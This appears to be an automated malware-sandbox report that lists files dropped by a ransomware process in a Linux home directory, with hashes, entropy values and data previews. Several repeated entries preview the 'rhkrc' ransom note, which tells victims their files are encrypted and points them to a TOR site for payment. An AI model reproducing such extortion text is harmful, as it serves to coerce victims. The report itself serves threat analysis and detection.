                  Preview: Ec..a.XhUF..V;g....".m..s.kPl^.q..P..FE...Br....Q:....B .....;c._%.'.@....t...2kL\9.....+.........o....=...../..x....2.....S..E.XST.,......*.W">..RZ.-...I..<......x...C..M.`.......(.[..'._o.P.[....T&.V......3?fT..3...M.......O.S.f*&1....P...JF............\>..._>I.1.;;9.z......I.,.o<..Q.{.H.y.>....NO.......&.s0.'R..U.d...[......dt...b.o....V|...Fi......8w1..(...Pybt.Yx.M!%..MU....6H.1.#.&....,<.+.....M..P:...,..`.-Z...%..4....Q...U..h.;v.v....#W.1K...4..U....1......3..4M.=...l..Q...L~._z=].e....CN.,.....[V`w..4.| oVw...../..&{K..td......pE4..2.."@;.q..p...e..gRh...:.`h/.V~..-...&$.............=...m('.X".%..&....qgND..=PIX..;....x...F.....n}+c+{.V|)...C..........^......6....q.F+.....i..K.Xn=.N.}e.E`>l{...3....E.g~&hJE1.>;.I2.$.8w....>iB.Rm..X>.rnO..m..Q./IN..W.r9.DlG........B.......*)+...Z..y.....4..%...3._...C....U.....`.Y.>.F...S.......R..''...s....Ze....._....o...{*..@..q...3..._..nMA.a..y9;.+$..n.2o1...'.?..%...^S....0...._.,cM."...!..`...A...'.,y....#./..S.bt...L..Q. |.:..R8........
                  /home/user/.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-default-sink
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):275
                  Entropy (8bit):5.370776489923382
                  Encrypted:false
                  SSDEEP:3:SK732s0iU95xuH3G2VJvfb7PmWE9CiYa1ESghgEUMzpET77cP1IBfRc0qWVDaHZh:Sq32iC5y1zmhOO/EUyp6XciBJF5VyZgo
                  MD5:6179E5EB1907F1322AD9BCFD82C64864
                  SHA1:B80C1670D0952AF415381A9089EAAE7149323824
                  SHA-256:1534985F2456ABA9DAA892F1496DB5B5DDFDD6571BAB3ACF6E0FB4DC9B9C2364
                  SHA-512:EE3AAABD907BA5AF907E8FBC283EBB65A36758D457D07346DED20B271F22BC9035E914E506489C30E6879C6151C20001D13B9F89FA8719A31667749C3A9BFBE0
                  Malicious:false
                  Reputation:low
                  Preview: .8.....\..<......V.....O.>....76...]q..2..l%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................"..|..!..T.5o2.8.Q.8.Z0.h_.a....v.;...4j.............{.D
                  /home/user/.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-default-source
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):274
                  Entropy (8bit):5.332556094953999
                  Encrypted:false
                  SSDEEP:6:d3UBfENFDy1zmhOO/EUyp6XcaRQ8fEblldq:hURe5O2DcUBVRgdq
                  MD5:C134F0B646FECCC2443D15B008168F98
                  SHA1:7C02DC651F0A194772E026EAFA7EE4FE104BC9A6
                  SHA-256:2DA4B6B460405AA7EBCA2BF443C0D6E3B32371C9B18E1841A101590A8D0F8883
                  SHA-512:430243E88238891E2C44B716DCB3C045EC8A1CB092C3153CF5A6188FEAFFAD183CA87B0D212860D5D8BF7E7B776B1010F47182A99F853411B4E6A88BE6AC5664
                  Malicious:false
                  Reputation:low
                  Preview: @I.x......x..P.....+..II....gx.65[.8,...a.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.........................................................................................Qx....|.ck.I.V.).....h....V.0Xq.;.@..Z..$...........l..
                  /home/user/.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-device-volumes.tdb
                  Process:./wQN5w2558L
                  File Type:DBase 3 data file (1877928854 records)
                  Category:dropped
                  Size (bytes):12520
                  Entropy (8bit):7.979379798807444
                  Encrypted:false
                  SSDEEP:384:kRZDPvB88NnZaUefZEcygGKNpl2e4GwVL8KcXCDaBI:ODPq8NZaXZEcfZrl24wbmC2I
                  MD5:1FEA4D9E1A9DFC55786CB03FFB1B6F6C
                  SHA1:0C2766497ACBBB6901A78EC5691A790A2F1B6729
                  SHA-256:088F640D3E782F09D4C83881A089DD73433D8399A181B9918516F795E8C646D7
                  SHA-512:ECDCD5B1DC61FBBB1DCCDD8516A772BF31DFC930C33EE5B294144F3197C13CAAB089921EBB87BBD14B9F26CAB09FA1B68C43558872A9547F63ACE431E57B23BB
                  Malicious:false
                  Reputation:low
                  Preview: .T.....o1.jN.7.a_H;d..gr.S..i<...../.......Y.H..{.%.C.?....2&.sk.\.F..7....!....y.....Q..e.~..-h.5..n...^U...?..6;...Px.....IS#..........LsJK.27@3...0..R...."[......ts..#.*.e.q.*.vL..b.x.R.O(*P?AE"~...W._3.d.....>B}2....8&.{....C..1.XB..2yE#?^...4...6.....`.!.tX...@......?]..2.|J.D...eY!..........?.}[.V4....#.VT.rh+..)...DXjyiB..kABF.o)..._....|.+......:.dQ.9..L.`..kt.E.H..4.>....B}.4.........V.b).OqI.#,d.)...........+..1*>.." .#....q.^......@....J...D......-...........P|.G...F ..(...T..T..3.t.LUK.).)GZU..."t...N}7a....Xr.Fu.=..|.........o..2.....P..u.".....n....l...D.....qZ..wh..X..w...z.....;.4$.3...........C...@.....E..|....._.....2..#;..X..?..J.(.....Y....._?@".+..3"....5."......c.;.q>.3/...T.i...<....^.6..Y+YW......-.i`..M.....}.'...,....PD..Lh....M!..3...B....`'C-o...Wsw5.T<P_...."d*.ao...c]y..$.S.`_...).4...,.......e;OJ..!2...w.g1zzi..v....v....B..F..S..;.1..q.t..3.7....-24.z.O.f..o0.bn...D%..1...-....+...U....3#..y.....pM.......W.c.J...7.rM;.:..H..."..@b....!8.B.l].....K...C. .
                  /home/user/.config/pulse/f0b45546524a75b2e6e8e8a55aab94da-stream-volumes.tdb
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):928
                  Entropy (8bit):7.447563924103277
                  Encrypted:false
                  SSDEEP:24:OUynqivRJd4VfXeUDwyhaGj/25gtE2DfmaF:OUyqKGfOTgSgrD+Q
                  MD5:570C6A9E23B21E46B68A46C57F082F78
                  SHA1:0F19BD8C126E3ABE1C3C3FD2CC99749FC57E1F0B
                  SHA-256:6973C1725131242D60D52A7F7D4D8022F07CE3F92F8612581B635CEA77AD1400
                  SHA-512:382470D7675BC003F7F0C5E5483B8645C0ED4B0AADEC3DEAF95F3428B375AFE63A8045A1EE9B31C31D4BF3C5C183129F01EDA4DB3BD3B109833752220967B617
                  Malicious:false
                  Reputation:low
                  Preview: ..{ld....v..f3....)...o......U...X.r....g.B.....6D.Z..d...W..v.yXr...')..1.I(7K...._8..x..'.vx..l...&....9...g.Jm........]...6Z.*.W.s.......[.pR.&E.;..........D..c?m.PF{....6.z/_@j.m.u.U.".p.=.C.&.../.....]5.m..:_e..vP....'|.X.7.....=.bDn .mL..."......VBn....C......H..7{N_l...?^P.0..Li<d.,".N......6....9...H&..).z6.....-.9....;.._0a.%*nk..WpL...G...!.+.4..?...1.Q...P.&..B.h.T..N.rc.6.p.r....b..~...]....#3.5&B.a...d...^sLJ..'....Dg..Aw1/C.W"...........?.T.....!...q[........k...Q/....U...OL...SgxFj.d.T..W..rp......^W.......s...Z?...G.\U.....E.D..'.C.....YO..%.DO.@..1FW.|.~%$..U....$U.)GP.V......`......JsC$.M$.Yw...y.EZ.5$.us..q.!zRd..R............YU..H.....`B..Cv($ w.....&..EM.=R.<..9.:..%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................F.n..8+.u#..T.....4~z..$D......\.J...@..+V..........}.53
                  /home/user/.config/pulse/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/update-notifier/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/upstart/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/user-dirs.dirs
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):864
                  Entropy (8bit):7.366785869112884
                  Encrypted:false
                  SSDEEP:24:PkTrms9b/Ellbo/Fdit7T2C4wq97M+32DfcLS:QjQll8Nc34wo7vmDCS
                  MD5:8C3CC63C79F42189205F6F87CE336A2B
                  SHA1:158DB5196CB90699C48C598677BB58E827C5AC85
                  SHA-256:5197885304865F881869DAC9615465B92DF72C3A94CDB47B6B35EA42ABBC7139
                  SHA-512:8840566756FF45B3140AA070083590A2DF8A8F90CF1E5F550F436EC873AD622D2DEAB2E36D3DA97DBA19229AE2294A46631A1D6B8F86CDC9215CAFF5FAC15BF0
                  Malicious:false
                  Reputation:low
                  Preview: *.......Sf9UQ.t*h...p..9d.;<..z.@...........&.e....U.E..\....G%.9B....O.s|6.o.wGB...i.C.7X..#.vi..0...OcM..i.P..............0...M~+..\b~.C....l..-.f...F.N...3T..m.GF.2D...,..d._...M...'.M.u...?..\.7x.GS....O'....bG..6..k..3.].......@.&..SReB%.t...wqH.|)v#....c....^......3.I9....WQL.v..=.n..YHP.._c..0.........(W..........R..`....[.3H..$.../.0...................$wy....~..N8..W..q.......>.u.........0...^.`@G.&.yD..H<.a..G..w..rq......=5kQY.Y..<..g.1x;..q.&+}.B[.j..=?.....W$.....S.7.........D;.pv.f.1.S9...fr.5........h.....wM8-.m^....z.N..R..K=..8..jZ.?r8.7._..?.dj.%.."_....<...I%.B'.W..}...?.....}.NA._.a`.{j,...D...*....7..(.Us%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................$1...@...........m.V%Z.*@mS..v..D.n..................Yj|
                  /home/user/.config/user-dirs.locale
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):237
                  Entropy (8bit):4.972389029160354
                  Encrypted:false
                  SSDEEP:3:/2VJvfb7PmWE9CiYa1ESghgEUMzpET77cP18If7dbAtxUx0T7uolW:61zmhOO/EUyp6XciIDdYo0ThU
                  MD5:33996D58501F93FFCDDC5E10C4847F4B
                  SHA1:EF7B22AE1F2CB0A2D0DBA11513B41CEB84064F15
                  SHA-256:16DEEA37058C3F9DF07B2C07BA2694A7BF0A566F13B00DE30DE1251423D1AC88
                  SHA-512:05DD17F0C7BF59482F54CF18A8E35FAA3D3FA10B95AAC82B2FF35A62B4AF1779607175584B1EFAFFC69434DA1B46CDD36F45F6C5252501F67423348078D50C06
                  Malicious:false
                  Reputation:low
                  Preview: .. .s%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................[.-y~.U.94^~..E.{.zM..).l7....%....x,.r..P2............T
                  /home/user/.config/xfce4/desktop/icons.screen0-1008x727.rc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):403
                  Entropy (8bit):6.296016994012056
                  Encrypted:false
                  SSDEEP:6:KH75ku4qaP0ovpZjveP7LeM1DQ4lmOT7OU1zmhOO/EUyp6Xc2KAozkIZFnn:mEpZjviPdtlh32DcUBalrnn
                  MD5:3DEDC8DFBA1E7430B0BDF993035B4C46
                  SHA1:752154071BAD4D734857AD6AC9D77E2D53E7908F
                  SHA-256:1CE7BBB54D436E7A6B8010D231FDB04613A9FEB332801650C56F20809F2E960E
                  SHA-512:D7867A9BB34268264FEEE8B053B1BCB67B53EA83741D3AAA0CD8120E9073DEF1DE5C015BF1B36C2D1CBEE07B8E745B8D93EE043ED595C79ACF77B943A5C3D09A
                  Malicious:false
                  Reputation:low
                  Preview: ....R...|...../EE`8t...0..kB=A..6...T....J..J...>...4..=v!....@..=>....W..h.Zp...VJ.U.,@L.,!(E.....c.8.pd.P&...iP.l..4I..P1C].lZe.M*.>9#....1a8....H6d.T*.........).f.<..J.%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp..........................................................................................&!..7.#u.:.B...V...>..<jb...{..~........N+........p..f
                  /home/user/.config/xfce4/desktop/icons.screen0-1008x752.rc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):352
                  Entropy (8bit):6.106492413796818
                  Encrypted:false
                  SSDEEP:6:gDSn1wMNOs9+ifgFkiH/zHkSd11zmhOO/EUyp6Xc7+zgr7u:gD41w+OUfifzH912DcUBG0aq
                  MD5:3C3E86307E68B96A0096A3FB2E2C7E89
                  SHA1:3FCD3D799F51FBC841F9F3CF741F68A8E8D78808
                  SHA-256:6896D65904B3699147E2E89AF21F4AB4894A4924F20EE4A44312C8543AA76C64
                  SHA-512:742FA99A8AEB5FAD3E9B481CD547D42C5BAAEEE6100D9408472E810393843A2E9CA16D78AA99C7DEEDDCA7800845F90DD5DC9F150A8920E8FB35CCD06D866D8C
                  Malicious:false
                  Reputation:low
                  Preview: ]......~...G`.QZ..|...n.:...c....._..,~7....eY#V.".@I.4][..7$sRi...>%6O....l..m.t.*D.......7./M"r.....q..|)...l.J2..G..d%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp.............................................................................................3v.....1...f.....;_f.....axB.Y......8T..........t..
                  /home/user/.config/xfce4/desktop/icons.screen0-784x559.rc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):352
                  Entropy (8bit):6.036166028847495
                  Encrypted:false
                  SSDEEP:6:x+iBf7DOveAp27W6vjQvZYcywq1zmhOO/EUyp6Xc6URUF7OUB:4UffOGApDEt2DcUB207lB
                  MD5:3DC85ECBFE0D337CD0E8E3D440DF6877
                  SHA1:3085D2425191922025CD3AB59F4BDC8E039E0807
                  SHA-256:7B6243F4AE95AF757DCAF796736F880F155657BD13FF940B22A9A1A60554B00F
                  SHA-512:79165741CBCDF9E682B012930C4B7731E6365FA1D9458B7B83FB7999B75C578DE48588E1FC164EAFF9FFCE9DE5F54DC7A72E770F9019C30B560C7045A574A955
                  Malicious:false
                  Reputation:low
                  Preview: b...........C..L.....j...)99x.<....E......1..L2.1e.Y....."..v..]Z`......i.68..Jo..5....|...s.n.$.Z...9U....!.q..c.x....?%;E.pa[..Z..oq.>.j.z........2m...j...h%&.!....R.G..7.ah...XW......8...,i..cp..,.v.V5._yp........................................................................................Lk...5\.[h.U.."....\.1.eE_k.[...Ch........'.........E..$
                  /home/user/.config/xfce4/desktop/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/xfce4/panel/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/xfce4/panel/whiskermenu-1.rc
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):1952
                  Entropy (8bit):7.772348310040414
                  Encrypted:false
                  SSDEEP:48:7GOQO8Ve8NJu+s4Z6C25Y1QG3GcgSIzxV7gEStynAIip9VDmDN:q1h48CxC25iQWGcgBVsESwnX29VDmDN
                  MD5:1FDFD9E2D4B39732282C5C0C0102C12E
                  SHA1:417DD9F9364772A989986D76901C497501BB702C
                  SHA-256:CB5BC9361EE0EC4FB305647603E8332457A17596A8EFA8A9889F89EAFBFD4A66
                  SHA-512:530E6D5D6AB7C3374C6F36B514B19CA0B3968C7E5A512A1659FC87C46DCF7BE6657ECEBFB7CEF4263402802A454592FD686AA68AF45097D920A64AC98B89EC3B
                  Malicious:false
                  Reputation:low
                  Preview: IHTN.i.~.;R.Q.Z..Q(...HV........~..x....w.<V....?H#j."D.9x%^..k.J..0kD.y....BSR^...\U%..S..).T.sp`....r.hi :.......5.}.(.C.kG.".<..>GI3.&.......p.b.|.J$....^........\..6%.=0)..=.Yl.d..g..,:..O.......]Q@r..4....4.k..-..0@`.".,s.$e.>.9..vq..J.......IT.......Z...0D.*....{&....SV.-......(..q7..t..?... L!\.z..^iJ.a.?.;j1b...P.v..=.r.`......Z..aK.l.[....T...W..G.....j......y;...............I.)Mf..^..v..VWQ......j.....c.5........}0.7.....q............TR.3.[......>&....y...#.W.Z5....O5..e.(1.........^ Tf..0...V...i.........E(..-[........(....P.....M9x....<.....6..GtZ..j...@....O........<....L.A}....<..1.eh;..A%......1F.d..DQ.R....<...J. ._..wb.j+..(=.rKZvU .o..m.e.C......[.q.\!Ib7jo.......C...........mN..ndl..1u.~.@'..p."W........u]..)...1F.....................R.)3...)...=.K..=....oq.....fq.?.(.M&d..G.slQ%hD5.; ...i...@.su...<KK....;..tq....S4eYF....D.>.w..a.....{....a..6...A.r.W...'...`~....l...B...W..=m=C....o..k.r.b....K..8@....DI....".G.NM.h..B|...........@[H.!K.>./...h.... q............E9
                  /home/user/.config/xfce4/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/xfce4/xfconf/rhkrc-readme.txt
                  Process:./wQN5w2558L
                  File Type:ASCII English text, with very long lines
                  Category:dropped
                  Size (bytes):2576
                  Entropy (8bit):5.411879294629398
                  Encrypted:false
                  SSDEEP:48:bidypHAdUZPKrpKzXAXPByYYXoRmJiUe74OhXA5srnPdab8aiAGJRQd:adUZPK8MPe0UeUOhJnP+uJRQd
                  MD5:72E054939F2DB3639B4D6E13B48B1DA6
                  SHA1:E046FE70989B5E0CCCB1B487911CD6D09D4FC64B
                  SHA-256:BC03D2E448BFD63C9A54924467AECA81B7E0B6D5ED28E2C1B947A694191E21ED
                  SHA-512:E8BD72E50AACAE2CC8E297969C309D5D8224383E79494C83F41681FD32C396A5DA53D1575BE6D510DBD9643EF229B3E7F92B75117471DBA3C228AA0CE41EB2BA
                  Malicious:false
                  Reputation:low
                  Preview: ---=== Welcome. Again. ===---..[+] Whats Happen? [+]..Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension rhkrc..By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER)...[+] What guarantees? [+]..Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests..To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee..If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money...[+] How to get access on website? [+]..You have two ways:..1) [Recommended] Using a TOR browser!. a) Download and inst
                  /home/user/.config/xfce4/xfconf/xfce-perchannel-xml/displays.xml
                  Process:./wQN5w2558L
                  File Type:data
                  Category:dropped
                  Size (bytes):983
                  Entropy (8bit):7.437588099917831
                  Encrypted:false
                  SSDEEP:24:h0n7s+5c33u4wND8snm2dImC1iU/32DfD7dKM:h0nwkcH5wNYsdH2i0mDD
                  MD5:CEDC327B2D86084AA0D2CC84DD7044E7
                  SHA1:76C0D5258CFD7F12DF35FDD4B2A46B75E1B85BF1
                  SHA-256:BCD9682A04274BB49622E6B9ADD6DC7622E202B36F5F6C74EA6850C54B1ACEA2
                  SHA-512:87A4A7B7AC88F36E2072DF494C6BED9C2334094C5C0C0DDE90F2589CBC1E7A34F2F3A7369325E49589BD14B84CAF71BCA8A23A4A54E6B32B8BD534BF6A3BB30D
                  Malicious:false
                  Reputation:low
